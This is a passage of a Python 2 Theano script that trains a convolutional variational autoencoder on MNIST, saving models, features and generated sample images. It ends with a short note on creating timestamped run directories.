    print 'cva_6layer_mnist_60000', nkerns, n_hidden, seed, drops, drop_inverses, dropout_flag, drop_inverses_flag
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'logdir:', logdir, 'predir', predir
        print >>f, 'cva_6layer_mnist_60000', nkerns, n_hidden, seed, drops, drop_inverses, dropout_flag, drop_inverses_flag

    datasets = datapy.load_data_gpu_60000(dataset, have_matrix=True)

    train_set_x, train_set_y, train_y_matrix = datasets[0]
    valid_set_x, valid_set_y, valid_y_matrix = datasets[1]
    test_set_x, test_set_y, test_y_matrix = datasets[2]

    # compute number of minibatches for training, validation and testing
    n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
    n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
    n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size

    ######################
    # BUILD ACTUAL MODEL #
    ######################
    print '... building the model'

    # allocate symbolic variables for the data
    index = T.lscalar()  # index to a [mini]batch
    x = T.matrix('x')  # the data is presented as rasterized images
    y = T.ivector('y')  # the labels are presented as 1D vector of
                        # [int] labels
    random_z = T.matrix('random_z')

    drop = T.iscalar('drop')
    drop_inverse = T.iscalar('drop_inverse')
    
    activation = nonlinearity.relu

    rng = np.random.RandomState(seed)
    rng_share = theano.tensor.shared_randomstreams.RandomStreams(0)
    input_x = x.reshape((batch_size, 1, 28, 28))
    
    recg_layer = []
    cnn_output = []

    #1
    recg_layer.append(ConvMaxPool.ConvMaxPool(
            rng,
            image_shape=(batch_size, 1, 28, 28),
            filter_shape=(nkerns[0], 1, 5, 5),
            poolsize=(2, 2),
            border_mode='valid',
            activation=activation
        ))
    if drops[0]==1:
        cnn_output.append(recg_layer[-1].drop_output(input=input_x, drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(input=input_x))

    #2
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[0], 12, 12),
        filter_shape=(nkerns[1], nkerns[0], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[1]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    
    #3
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[1], 12, 12),
        filter_shape=(nkerns[2], nkerns[1], 3, 3),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[2]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    #4
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[2], 5, 5),
        filter_shape=(nkerns[3], nkerns[2], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[3]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #5
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[3], 5, 5),
        filter_shape=(nkerns[4], nkerns[3], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[4]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    mlp_input_x = cnn_output[-1].flatten(2)

    activations = []

    #1
    recg_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in= 5 * 5 * nkerns[-1],
            n_out=n_hidden[0],
            activation=activation
        ))
    if drops[-1]==1:
        activations.append(recg_layer[-1].drop_output(input=mlp_input_x, drop=drop, rng=rng_share))
    else:
        activations.append(recg_layer[-1].output(input=mlp_input_x))

    #stochastic layer
    recg_layer.append(GaussianHidden.GaussianHidden(
            rng=rng,
            input=activations[-1],
            n_in=n_hidden[0],
            n_out = n_hidden[1],
            activation=None
        ))

    z = recg_layer[-1].sample_z(rng_share)


    gene_layer = []
    z_output = []
    random_z_output = []

    #1
    gene_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in=n_hidden[1],
            n_out = n_hidden[0],
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z))
    random_z_output.append(gene_layer[-1].output(input=random_z))

    #2
    gene_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in=n_hidden[0],
            n_out = 5*5*nkerns[-1],
            activation=activation
        ))

    if drop_inverses[0]==1:
        z_output.append(gene_layer[-1].drop_output(input=z_output[-1], drop=drop_inverse, rng=rng_share))
        random_z_output.append(gene_layer[-1].drop_output(input=random_z_output[-1], drop=drop_inverse, rng=rng_share))
    else:
        z_output.append(gene_layer[-1].output(input=z_output[-1]))
        random_z_output.append(gene_layer[-1].output(input=random_z_output[-1]))

    input_z = z_output[-1].reshape((batch_size, nkerns[-1], 5, 5))
    input_random_z = random_z_output[-1].reshape((n_batch, nkerns[-1], 5, 5))

    #1
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-1], 5, 5),
            filter_shape=(nkerns[-2], nkerns[-1], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=input_z))
    random_z_output.append(gene_layer[-1].output_random_generation(input=input_random_z, n_batch=n_batch))
    
    #2
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-2], 5, 5),
            filter_shape=(nkerns[-3], nkerns[-2], 3, 3),
            poolsize=(2, 2),
            border_mode='full', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #3
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-3], 12, 12),
            filter_shape=(nkerns[-4], nkerns[-3], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #4
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-4], 12, 12),
            filter_shape=(nkerns[-5], nkerns[-4], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #5 stochastic layer 
    # for the last layer, the nonlinearity should be a sigmoid so that the output is the mean of a Bernoulli
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-5], 12, 12),
            filter_shape=(1, nkerns[-5], 5, 5),
            poolsize=(2, 2),
            border_mode='full', 
            activation=nonlinearity.sigmoid
        ))

    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))
   
    gene_layer.append(NoParamsBernoulliVisiable.NoParamsBernoulliVisiable(
            #rng=rng,
            #mean=z_output[-1],
            #data=input_x,
        ))
    logpx = gene_layer[-1].logpx(mean=z_output[-1], data=input_x)


    # 4-D tensor of random generation
    random_x_mean = random_z_output[-1]
    random_x = gene_layer[-1].sample_x(rng_share, random_x_mean)

    #L = (logpx + logpz - logqz).sum()
    cost = (
        (logpx + recg_layer[-1].logpz - recg_layer[-1].logqz).sum()
    )
    
    px = (logpx.sum())
    pz = (recg_layer[-1].logpz.sum())
    qz = (- recg_layer[-1].logqz.sum())

    params=[]
    for g in gene_layer:
        params+=g.params
    for r in recg_layer:
        params+=r.params
    gparams = [T.grad(cost, param) for param in params]

    weight_decay=1.0/n_train_batches
    l_r = theano.shared(np.asarray(learning_rate, dtype=np.float32))
    #get_optimizer = optimizer.get_adam_optimizer(learning_rate=learning_rate)
    get_optimizer = optimizer.get_adam_optimizer_max(learning_rate=l_r, 
        decay1=0.1, decay2=0.001, weight_decay=weight_decay, epsilon=1e-8)
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'AdaM', learning_rate, weight_decay
    updates = get_optimizer(params,gparams)

    # compiling a Theano function that computes the mistakes that are made
    # by the model on a minibatch
    test_model = theano.function(
        inputs=[index],
        outputs=cost,
        #outputs=layer[-1].errors(y),
        givens={
            x: test_set_x[index * batch_size:(index + 1) * batch_size],
            #y: test_set_y[index * batch_size:(index + 1) * batch_size],
            #y_matrix: test_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    validate_model = theano.function(
        inputs=[index],
        outputs=cost,
        #outputs=layer[-1].errors(y),
        givens={
            x: valid_set_x[index * batch_size:(index + 1) * batch_size],
            #y: valid_set_y[index * batch_size:(index + 1) * batch_size],
            #y_matrix: valid_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )
    
    '''
    Save parameters and activations
    '''

    parameters = theano.function(
        inputs=[],
        outputs=params,
    )

    train_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: train_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )
    
    valid_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: valid_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: valid_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )

    test_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: test_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: test_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )

    # compiling a Theano function `train_model` that returns the cost, but
    # in the same time updates the parameter of the model based on the rules
    # defined in `updates`

    debug_model = theano.function(
        inputs=[index],
        outputs=[cost, px, pz, qz],
        #updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag),
            drop_inverse: np.cast['int32'](drop_inverses_flag)
        }
    )

    random_generation = theano.function(
        inputs=[random_z],
        outputs=[random_x_mean.flatten(2), random_x.flatten(2)],
        givens={
            #drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    train_bound_without_dropout = theano.function(
        inputs=[index],
        outputs=cost,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    train_model = theano.function(
        inputs=[index],
        outputs=cost,
        updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag),
            drop_inverse: np.cast['int32'](drop_inverses_flag)
        }
    )

    ##################
    # Pretrain MODEL #
    ##################
    if predir is not None:
        color.printBlue('... setting parameters')
        color.printBlue(predir)
        pre_train = np.load(predir+'model.npz')
        pre_train = pre_train['model']
        for (para, pre) in zip(params, pre_train):
            para.set_value(pre)
        tmp =  [debug_model(i) for i in xrange(n_train_batches)]
        tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
        print '------------------', tmp

    ###############
    # TRAIN MODEL #
    ###############
    print '... training'

    # early-stopping parameters
    patience = 10000  # look at this many examples regardless
    patience_increase = 2  # wait this much longer when a new best is
                           # found
    improvement_threshold = 0.995  # a relative improvement of this much is
                                   # considered significant
    validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatches before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch

    best_validation_bound = -1000000.0
    best_iter = 0
    test_score = 0.
    start_time = time.clock()
    NaN_count = 0
    epoch = 0
    threshold = 0
    validation_frequency = 1
    generatition_frequency = 10
    if predir is not None:
        threshold = 0
    color.printRed('threshold, '+str(threshold) + 
        ' generatition_frequency, '+str(generatition_frequency)
        +' validation_frequency, '+str(validation_frequency))
    done_looping = False
    n_epochs = 600
    decay_epochs = 500

    '''
    print 'test initialization...'
    pre_model = parameters()
    for i in xrange(len(pre_model)):
        pre_model[i] = np.asarray(pre_model[i])
        print pre_model[i].shape, np.mean(pre_model[i]), np.var(pre_model[i])
    print 'end test...'
    '''
    while (epoch < n_epochs) and (not done_looping):
        epoch = epoch + 1
        minibatch_avg_cost = 0
        
        tmp_start1 = time.clock()

        test_epoch = epoch - decay_epochs
        if test_epoch > 0 and test_epoch % 10 == 0:
            print l_r.get_value()
            with open(logdir+'hook.txt', 'a') as f:
                print >>f,l_r.get_value()
            l_r.set_value(np.cast['float32'](l_r.get_value()/3.0))


        for minibatch_index in xrange(n_train_batches):
            #print minibatch_index
            '''
            color.printRed('lalala')
            xxx = dims(minibatch_index)
            print xxx.shape
            '''
            #print n_train_batches
            minibatch_avg_cost += train_model(minibatch_index)
            # iteration number
            iter = (epoch - 1) * n_train_batches + minibatch_index
        
        if math.isnan(minibatch_avg_cost):
            NaN_count+=1
            color.printRed("NaN detected. Reverting to saved best parameters")
            print '---------------NaN_count:', NaN_count
            with open(logdir+'hook.txt', 'a') as f:
                print >>f, '---------------NaN_count:', NaN_count
            
            tmp =  [debug_model(i) for i in xrange(n_train_batches)]
            tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            print '------------------NaN check:', tmp
            with open(logdir+'hook.txt', 'a') as f:
               print >>f, '------------------NaN check:', tmp
               
            model = parameters()
            for i in xrange(len(model)):
                model[i] = np.asarray(model[i]).astype(np.float32)
                print model[i].shape, np.mean(model[i]), np.var(model[i])
                print np.max(model[i]), np.min(model[i])
                print np.all(np.isfinite(model[i])), np.any(np.isnan(model[i]))
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, model[i].shape, np.mean(model[i]), np.var(model[i])
                    print >>f, np.max(model[i]), np.min(model[i])
                    print >>f, np.all(np.isfinite(model[i])), np.any(np.isnan(model[i]))

            best_before = np.load(logdir+'model.npz')
            best_before = best_before['model']
            for (para, pre) in zip(params, best_before):
                para.set_value(pre)
            tmp =  [debug_model(i) for i in xrange(n_train_batches)]
            tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            print '------------------', tmp
            return

        #print 'optimization_time', time.clock() - tmp_start1
        print epoch, 'stochastic training error', minibatch_avg_cost / float(n_train_batches*batch_size)
        with open(logdir+'hook.txt', 'a') as f:
            print >>f, epoch, 'stochastic training error', minibatch_avg_cost / float(n_train_batches*batch_size)

        if epoch % validation_frequency == 0:
            tmp_start2 = time.clock()

            test_losses = [test_model(i) for i
                                 in xrange(n_test_batches)]
            this_test_bound = np.mean(test_losses)/float(batch_size)
            
            #tmp =  [debug_model(i) for i
            #                     in xrange(n_train_batches)]
            #tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            
            print epoch, 'test bound', this_test_bound
            #print tmp
            with open(logdir+'hook.txt', 'a') as f:
                print >>f, epoch, 'test bound', this_test_bound
            
        if epoch%100==0:    
            
            model = parameters()
            for i in xrange(len(model)):
                model[i] = np.asarray(model[i]).astype(np.float32)
            np.savez(logdir+'model-'+str(epoch), model=model)
            
            for i in xrange(n_train_batches):
                if i == 0:
                    train_features = np.asarray(train_activations(i))
                else:
                    train_features = np.vstack((train_features, np.asarray(train_activations(i))))
            
            for i in xrange(n_valid_batches):
                if i == 0:
                    valid_features = np.asarray(valid_activations(i))
                else:
                    valid_features = np.vstack((valid_features, np.asarray(valid_activations(i))))

            for i in xrange(n_test_batches):
                if i == 0:
                    test_features = np.asarray(test_activations(i))
                else:
                    test_features = np.vstack((test_features, np.asarray(test_activations(i))))
            np.save(logdir+'train_features', train_features)
            np.save(logdir+'valid_features', valid_features)
            np.save(logdir+'test_features', test_features)
        
        tmp_start4=time.clock()
        if epoch % generatition_frequency == 0:
            tail='-'+str(epoch)+'.png'
            random_z = np.random.standard_normal((n_batch, n_hidden[-1])).astype(np.float32)
            _x_mean, _x = random_generation(random_z)
            #print _x.shape
            #print _x_mean.shape
            image = paramgraphics.mat_to_img(_x.T, dim_input, colorImg=colorImg)
            image.save(logdir+'samples'+tail, 'PNG')
            image = paramgraphics.mat_to_img(_x_mean.T, dim_input, colorImg=colorImg)
            image.save(logdir+'mean_samples'+tail, 'PNG')
        #print 'generation_time', time.clock() - tmp_start4

    end_time = time.clock()
    print >> sys.stderr, ('The code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.2fm' % ((end_time - start_time) / 60.))
    if NaN_count > 0:
        print '---------------NaN_count:', NaN_count
        with open(logdir+'hook.txt', 'a') as f:
            print >>f, '---------------NaN_count:', NaN_count
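
The training script above guards its results directory with "if not os.path.exists(logdir): os.makedirs(logdir)" before writing models, features, and sample images into it. A minimal sketch of that pattern with a timestamped run directory; make_run_dir and the directory names below are illustrative, not part of mmdgm:

import os
import time

def make_run_dir(base='results', tag='run'):
    """Create (if necessary) and return a timestamped directory for one training run."""
    logdir = os.path.join(base, '%s_%d' % (tag, int(time.time())))
    if not os.path.exists(logdir):
        os.makedirs(logdir)
    return logdir

# Example usage:
# logdir = make_run_dir('results/supervised/cva/mnist', 'cva_6layer')
# with open(os.path.join(logdir, 'hook.txt'), 'a') as f:
#     f.write('logdir: %s\n' % logdir)

Note that os.makedirs(logdir, exist_ok=True) would avoid the small race between the os.path.exists check and the directory creation; the explicit check is kept here only to mirror the example.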